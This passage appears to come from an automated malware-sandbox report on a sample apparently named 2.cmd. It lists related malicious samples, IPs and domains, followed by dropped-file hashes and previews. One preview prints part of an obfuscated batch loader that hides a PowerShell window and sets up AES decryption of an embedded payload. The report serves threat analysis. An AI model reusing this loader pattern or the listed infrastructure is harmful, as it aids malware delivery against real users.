                                  • /?output=json
                                  ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                  • ipwhois.app/xml/
                                  cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                  • /?output=json
                                  Clipper.exeGet hashmaliciousUnknownBrowse
                                  • /?output=json
                                  cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                                  • /?output=json
                                  Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                  • /?output=json
                                  Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                  • /?output=json
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  azure-winsecure.com1.cmdGet hashmaliciousUnknownBrowse
                                  • 154.216.20.132
                                  2.cmdGet hashmaliciousUnknownBrowse
                                  • 154.216.20.132
                                  download_2.exeGet hashmaliciousQuasarBrowse
                                  • 154.216.20.132
                                  ipwho.is1.cmdGet hashmaliciousUnknownBrowse
                                  • 108.181.98.179
                                  2.cmdGet hashmaliciousUnknownBrowse
                                  • 195.201.57.90
                                  download_2.exeGet hashmaliciousQuasarBrowse
                                  • 147.135.36.89
                                  MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                  • 195.201.57.90
                                  N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                  • 195.201.57.90
                                  Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                  • 195.201.57.90
                                  mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                                  • 108.181.98.179
                                  SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exeGet hashmaliciousQuasarBrowse
                                  • 195.201.57.90
                                  http://ufvskbzrquea.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 195.201.57.90
                                  http://serviceappinfms12.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 195.201.57.90
                                  bg.microsoft.map.fastly.netTon618.exeGet hashmaliciousQuasarBrowse
                                  • 199.232.214.172
                                  Ton618 (2).exeGet hashmaliciousQuasarBrowse
                                  • 199.232.210.172
                                  https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                  • 199.232.214.172
                                  2.cmdGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                  • 199.232.210.172
                                  veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 199.232.210.172
                                  http://investmentmemo.xyzGet hashmaliciousHtmlDropperBrowse
                                  • 199.232.210.172
                                  https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$Get hashmaliciousHtmlDropperBrowse
                                  • 199.232.214.172
                                  mnFHs2DuKg.exeGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  PO906-645S790768.xlam.xlsxGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  HETZNER-ASDE2.cmdGet hashmaliciousUnknownBrowse
                                  • 195.201.57.90
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 49.12.197.9
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 49.12.197.9
                                  gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                  • 116.203.0.21
                                  dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                  • 116.203.0.21
                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                  • 49.12.197.9
                                  oRdgOQMxjr.exeGet hashmaliciousRedLineBrowse
                                  • 178.63.51.126
                                  https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                  • 136.243.216.232
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 49.12.197.9
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 49.12.197.9
                                  SKHT-ASShenzhenKatherineHengTechnologyInformationCoRICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                  • 154.216.20.22
                                  1.cmdGet hashmaliciousUnknownBrowse
                                  • 154.216.20.132
                                  2.cmdGet hashmaliciousUnknownBrowse
                                  • 154.216.20.132
                                  download_2.exeGet hashmaliciousQuasarBrowse
                                  • 154.216.20.132
                                  New order02102024.docGet hashmaliciousNanocoreBrowse
                                  • 154.216.20.22
                                  KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 154.216.20.22
                                  https://akbb.kampanyakrediiislemleri.com/Get hashmaliciousUnknownBrowse
                                  • 154.216.20.140
                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                  • 156.254.70.160
                                  ppc.elfGet hashmaliciousMiraiBrowse
                                  • 156.254.70.191
                                  x86.elfGet hashmaliciousMiraiBrowse
                                  • 156.241.11.83
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousCredential FlusherBrowse
                                  • 195.201.57.90
                                  QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  • 195.201.57.90
                                  1.cmdGet hashmaliciousUnknownBrowse
                                  • 195.201.57.90
                                  2.cmdGet hashmaliciousUnknownBrowse
                                  • 195.201.57.90
                                  download_2.exeGet hashmaliciousQuasarBrowse
                                  • 195.201.57.90
                                  PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                  • 195.201.57.90
                                  gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                  • 195.201.57.90
                                  dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                  • 195.201.57.90
                                  tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                                  • 195.201.57.90
                                  SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                  • 195.201.57.90
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Windows \System32\ComputerDefaults.exe2.cmdGet hashmaliciousUnknownBrowse
                                    yhDRFwEXdd.cmdGet hashmaliciousUnknownBrowse
                                      EvzLqMb67R.jsGet hashmaliciousUnknownBrowse
                                        NEW_DESIGN_SPECIFICATION_SAMPLE_DRAWINGS.cmdGet hashmaliciousUnknownBrowse
                                          SC.cmdGet hashmaliciousXmrigBrowse
                                            bin.ps1Get hashmaliciousXmrigBrowse
                                              z2InvoiceConfirmation3.batGet hashmaliciousAgentTeslaBrowse
                                                z16INVOICE07.batGet hashmaliciousUnknownBrowse
                                                  myxwr5cli.batGet hashmaliciousUnknownBrowse
                                                    Attachments.zipGet hashmaliciousUnknownBrowse
                                                      C:\Users\user\AppData\Local\Temp\MLANG.dll2.cmdGet hashmaliciousUnknownBrowse
                                                        yhDRFwEXdd.cmdGet hashmaliciousUnknownBrowse
                                                          EvzLqMb67R.jsGet hashmaliciousUnknownBrowse
                                                            NEW_DESIGN_SPECIFICATION_SAMPLE_DRAWINGS.cmdGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8192
                                                                Entropy (8bit):0.363788168458258
                                                                Encrypted:false
                                                                SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                Malicious:false
                                                                Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1310720
                                                                Entropy (8bit):1.3107723261529642
                                                                Encrypted:false
                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrF:KooCEYhgYEL0In
                                                                MD5:D38AB32FD32EF4455CFA271B07DAB5E1
                                                                SHA1:80317FA0751DDB4B2E238D97C1909D837BD61420
                                                                SHA-256:F9BFB16D104048E708DEF76D69C27D145DD5D58D8C6A8F54CA38EBF054B6C680
                                                                SHA-512:619B646E7555EC9B2B2BEEA01291DC81951EC5A44531FD131EF54A239ADD15DD0689C6661468FA9EB7C80BFE1A7667048DBE3183803C2E3AD20805D3788D13A8
                                                                Malicious:false
                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5c7bfbb4, page size 16384, Windows version 10.0
                                                                Category:dropped
                                                                Size (bytes):1310720
                                                                Entropy (8bit):0.42216185509750687
                                                                Encrypted:false
                                                                SSDEEP:1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+kA4/Iw4KKazAkUk1k2DO:vazag03A2UdzJDO
                                                                MD5:032CC120F088115EB7BD9F7C9587E0D6
                                                                SHA1:BB25B6AE854CA610DB1851ECECAA7706A54747EE
                                                                SHA-256:7C5148B3096505FBF6C399FB68A091A2029918DF042508F4252894B6F5A7457D
                                                                SHA-512:4853ADB4BC2A7BCF7415A6587498CE478C3A2D7DF4DF9E0651FF0B000C28F588CDC08C49F75999499118D3C1A90ADBF8CD2081FAEA0938A7CBA2A6B41ED631D6
                                                                Malicious:false
                                                                Preview:\{..... .......Y.......X\...;...{......................n.%...../7...|..#4...|/.h.#...../7...|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................A/7...|...................=../7...|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.07883666842832728
                                                                Encrypted:false
                                                                SSDEEP:3:8lsetYexPYZ60+fIyqOmvZ4tLfallMezlXlnl+/rT6:8bzxPYZ60eqP4hmN0P
                                                                MD5:C52787A7B3A527FDD870EF9FD9D159CB
                                                                SHA1:977B1414F11BABF1276CB82840F8E00525063E34
                                                                SHA-256:89B2650F5830D229785BAC707EB5E77B4E72577513439868E51E5812A1879710
                                                                SHA-512:A52783DD17F73A7857D9B90A421F84B13E40713EA984B95C1E87AEDC006C3A8AA0FA13196DBFC8BF51252E101A6AC89FECC6F34F5E13E749AFFAD21599B2EE6E
                                                                Malicious:false
                                                                Preview:"..".....................................;...{..#4...|/./7...|........../7...|../7...|...a$L/7...|5..................=../7...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):71954
                                                                Entropy (8bit):7.996617769952133
                                                                Encrypted:true
                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                Malicious:false
                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):328
                                                                Entropy (8bit):3.234591379520364
                                                                Encrypted:false
                                                                SSDEEP:6:kKT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:SDImsLNkPlE99SNxAhUe/3
                                                                MD5:BBE865AD593A85DA6B55888A74A189DA
                                                                SHA1:81DB5632EB3F9473D04B1287E9A55C5C9058582A
                                                                SHA-256:799E99DDE15E86CE50062397BA516EF39258BFBD28858227E888D7798890C9FE
                                                                SHA-512:D0C3DD2CC51B55CC11D2A00F13AA5DE7EF4DCE5D8A58AF8D333B3C7D3098F922D04C97C5C6EE1293279643D0E2BA1121B925FDA653C4736ABAAE74810CEE193D
                                                                Malicious:false
                                                                Preview:p...... ........"l......(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):9713
                                                                Entropy (8bit):4.940954773740904
                                                                Encrypted:false
                                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                                MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                                SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                                SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                                SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                                Malicious:false
                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):2832
                                                                Entropy (8bit):5.414030276061799
                                                                Encrypted:false
                                                                SSDEEP:48:0AzsSU4fv4RTmFoUL5a+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlH3IaKEg9qrh7KrJ5Eo9Adrxz
                                                                MD5:AEAE360E650B31CA6B02FEC766C05D91
                                                                SHA1:212CF24B99982A3EDEF0B5BE5FE5292EA050019A
                                                                SHA-256:A424898D65180BA20C7A7F99595F2CC229A13318B614BB84DB726C15E8B2E453
                                                                SHA-512:8F3FC0AE4C1AB6380CC9FCB49F107C748B989FF5C0004F03E7C7D241C0FFC5DA74E301483C687D2AEDB25C2193F738F5708CD9E1FED45B1B7884305966BA905C
                                                                Malicious:false
                                                                Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.0818136700495735
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                                MD5:BCE202BE96167104C292ABBA72DDA325
                                                                SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                                SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                                SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):105984
                                                                Entropy (8bit):5.943521586025223
                                                                Encrypted:false
                                                                SSDEEP:3072:Ih4bKIaR4QhlUKfZq1T5cL14vVlg5dLZUzkKb:B+I7klUKfIj0KwK
                                                                MD5:D4F7FF46BB9412B90E8F091F6A9115C3
                                                                SHA1:E7C82ECA0BD2C9969B036EFD07BFB6A1E3A342CD
                                                                SHA-256:53493EDDDF3E4509F791D0E26EA80D8B2283AA95A0F4E263EBB8FC1E7D8D9C82
                                                                SHA-512:7BF7A9424F8540D4F867C53C3042FC91C7C4BF09F8C790D664908C61CCE3D32A16FA286FFF2D5B9AED3C25F645FDBA50A2C91030EEA9DA1E8E7215C414E32A0D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Joe Sandbox View:
                                                                • Filename: 2.cmd, Detection: malicious, Browse
                                                                • Filename: yhDRFwEXdd.cmd, Detection: malicious, Browse
                                                                • Filename: EvzLqMb67R.js, Detection: malicious, Browse
                                                                • Filename: NEW_DESIGN_SPECIFICATION_SAMPLE_DRAWINGS.cmd, Detection: malicious, Browse
                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:.C.TMC.TMC.TM..WLF.TM..QL.TM..PLI.TM..WLJ.TM..PLM.TM..QLc.TM..ULF.TMC.UM..TMP.]LA.TMP..MB.TMP.VLB.TMRichC.TM................PE..d...rx.f.........." ...(..................................................................`.................................................t...<...............................P....i..p...........................Ph..@...............p............................text...@........................... ..`.rdata..............................@..@.data...P............x..............@....pdata..............................@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (57316), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1962270
                                                                Entropy (8bit):6.008561560748652
                                                                Encrypted:false
                                                                SSDEEP:24576:TKLGeNfzqE3gY/noO0Bq8JvRMiUOCYUsQJQTUVXLbsPYmgaF+qbAmMNN0DCDYEpE:b2dGqkqgv+uS6B5R
                                                                MD5:DF146AE56B040CE90F1C879A8282A03E
                                                                SHA1:2E6024AD1883B72057DBAF5EAA2EA84656A443CF
                                                                SHA-256:1E0819A321E43F692E6F2BB08C153AC62B2AE2CBBFB3A1AC7806D55CA3B54DF9
                                                                SHA-512:FBEC78D95389A2649B86AB8D452AF51AB5414E73B5E371838D8E11E85F49573D2452EB97D6790B2BCDB32D9015E30E2396D9570C962C45EEED67351DF622EA08
                                                                Malicious:false
                                                                Preview:title hdsgsdgsdgssd :dsgdsgh3..title hdsgsdgsdgssd :3qghghw3ygwe..set "mKOF=Lo"..set "rBpV=nvo"..set "pFKF=lect"..set "xWpl=byp"..set "XzpL=prof"..set "gjattCHlpfMJWyeIyYqV=echo cls;powershell "..set "HUiktjTsSMbhkrAdJvmO=-w hidden;function d"..set "UeFjTaJYSHMYjtdmbQaj=ecrypt_function($par"..set "JosDdEzFXbZdMBbDoZqs=am_var){.$aes_var=[S"..set "zUAlZdYQnncSucfFMcfo=ystem.Security.Crypt"..set "BebRHJmHrzXbAHKOOgDa=ography.Aes]::Create"..set "GJrJZhIKwwQlUbRvTJEq=();.$aes_var.Mode=[S"..set "QqyOparNsqQFzeIRNrSA=ystem.Security.Crypt"..set "aClVIMhyQoVfCmjpkDuY=ography.CipherMode]:"..set "PVsfFkMPtZICQdqofCfD=:CBC;.$aes_var.Paddi"..set "STWdvLdmUsHjXTKekfpx=ng=[System.Security."..set "asfRGsoyWVkHyQgWZoKU=Cryptography.Padding"..set "hzUasyFXtmeamHDANewc=Mode]::PKCS7;.$aes_v"..set "wFqZiZLgMOeVuvqBxfzi=ar.Key=[System.Conve"..set "NreKRjvRnGiVSIxCjVRt=rt]::FromBase64Strin"..set "NykFhiFRqbcIEoofAFiZ=g('t/6WxGFiWqzOYDiMe"..set "EUTgFicMYOsBnguohzCI=QW3vewy5Lst4QLmvh7FI"..set "DDAlDAqEtrcDNSP
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:false
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
